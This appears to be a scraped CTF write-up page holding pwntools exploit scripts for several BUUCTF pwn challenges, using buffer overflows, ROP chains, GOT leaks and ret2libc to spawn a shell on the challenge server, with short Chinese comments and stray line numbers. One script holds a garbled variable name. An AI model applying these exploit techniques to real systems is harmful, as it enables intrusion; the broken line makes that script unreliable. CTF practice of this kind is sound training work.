buuctf 一些题

0
1
2
3
4
5
6

fgets(s, 32, edata);  //只让输入32个字符  stack偏移0x3c 

replace((std::string *)v3);

system("cat flag") ->08048F0D

STACK 0X3C   I替换成you

0
1
2
3
4
5

from pwn import *
r=process('./pwn1_sctf_2016')
#r=remote("node4.buuoj.cn",29806)
payload=b'I'*20+b'a'*4+p32(0x08048F0D)
r.sendline(payload)
r.interactive()

0
1
2
3
4
5
6

from pwn import *
#r=process('./level0')
r=remote('node4.buuoj.cn',27712)
context(os='linux', arch='amd64', log_level='debug')
payload=b'a'*0x80+b'a'*8+p64(0x0400596)
r.sendafter('Hello, World\n',payload)
r.interactive()

 0
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22

elf=ELF('./ciscn2019')
pop_rdi_ret=0x400c83
ret=0x4006b9
puts_got=elf.got['puts']
puts_plt=elf.plt['puts']
main=0x400B28
r.sendlineafter('choice!\n',b'1')
payload=b'\0'+b'a'*87+p64(pop_rdi_ret)+p64(puts_got)+p64(puts_plt)
payload+=p64(main)
r.sendlineafter('encrypted\n',payload)
puts_real_addr=u64(r.recvuntil(b"\x7f")[-6:].ljust(8,b'\x00'))
libc=LibcSearcher('puts',puts_real_addr)#search libc version
libc_puts_offset_addr=libc.dump('puts')#search for the offset addr of 'puts'
libc_base_addr=puts_real_addr-libc_puts_offset_addr
print(libc_base_addr)
r.recvuntil('choice!\n')
r.sendline(b"1")
system_addr=libc_base_addr+libc.dump('system')
binshstr_addr=libc_base_advvvvvvvvdr+libc.dump('str_bin_sh')
payload2=b'\0'+b'a'*87+p64(ret)+p64(pop_rdi_ret)+p64(binshstr_addr)+p64(system_addr)
#注意libc版本>2.27的时候call system要16位对齐，所以这里多了一个ret
r.sendlineafter('encrypted\n',payload2)
r.interactive()

 0
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22

from pwn import *
from LibcSearcher import *
#r=process('./bjdctf_2020_babystack')
r=remote('node4.buuoj.cn',29753)
elf=ELF('./bjdctf_2020_babystack')
puts_got=elf.got['puts']
puts_plt=elf.plt['puts']
pop_rdi_ret=0x400833
main=0x04006FB
ret=0x400561
r.sendlineafter('name:\n',b'100')
payload=b'a'*24+p64(pop_rdi_ret)+p64(puts_got)+p64(puts_plt)+p64(main)
r.sendlineafter('name?\n',payload)
puts_real=u64(r.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
print(hex(puts_real))
libc=LibcSearcher('puts',puts_real)
libcbase=puts_real-libc.dump('puts')
system_addr=libcbase+libc.dump('system')
binsh_addr=libcbase+libc.dump('str_bin_sh')
payload2=b'a'*24+p64(ret)+p64(pop_rdi_ret)+p64(binsh_addr)+p64(system_addr)
r.sendlineafter('name:\n',b'100')
r.sendlineafter('name?\n',payload2)
r.interactive()

 0
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26

from pwn import *
from LibcSearcher import *
#r=process('./pwn2')
r=remote('node4.buuoj.cn',28987)
elf=ELF('./pwn2')
write_got=elf.got['write']
write_plt=elf.plt['write']
libc = ELF('./libc-2.23.so')
system_libc = libc.symbols['system'] 
binsh_libc = next(libc.search(b'/bin/sh'))
write_libc = libc.symbols['write']

main_addr=0x8048825
payload=b'\x00'+b'\xff'*0x7#这里不能用b'\0xff'
r.sendline(payload)
r.recvuntil('Correct\n')
r.sendline(b'a'*235+p32(write_plt)+p32(main_addr)+p32(1)+p32(write_got)+p32(0x4))
write_real_addr=u32(r.recv(4))
#libc=LibcSearcher('write',write_real_addr)
libcbase=write_real_addr-write_libc
#libcbase=write_real_addr-libc.dump('write')
system_addr=libcbase+system_libc#libc.dump('system')
binsh_addr=libcbase+binsh_libc#+libc.dump('str_bin_sh')
r.sendline(payload)
print(r.recvuntil('Correct\n'))
r.sendline(b'a'*235+p32(system_addr)+p32(0xdeadbeef)+p32(binsh_addr))
r.interactive()

0
1
2
3
4
5
6
7
8
9

from pwn import *
#r=process('./get_started_3dsctf_2016')
r=remote('node4.buuoj.cn',27376)
elf=ELF('./get_started_3dsctf_2016')
get_flag=0x80489A0
exitaddr=0x804E6A0#必须要有个exit 异常结束程序不回显
payload=b'a'*0x38+p32(get_flag)+p32(exitaddr)+p32(0x308CD64F)+p32(0x195719D1)
r.sendline(payload)
print(r.recv())
r.interactive()

 0
 1
 2
 3
 4
 5
 6
 7
 8
 9
10

from pwn import *

#r=process('./level2_x64')
r=remote('node4.buuoj.cn',26647)
elf=ELF('./level2_x64')
pop_rdiret=0x00000000004006b3
ret=0x00000000004004a1
system_plt=elf.plt['system']
payload=b'a'*0x88+p64(ret)+p64(pop_rdiret)+p64(0x0600A90)+p64(system_plt)
r.sendline(payload)
r.interactive()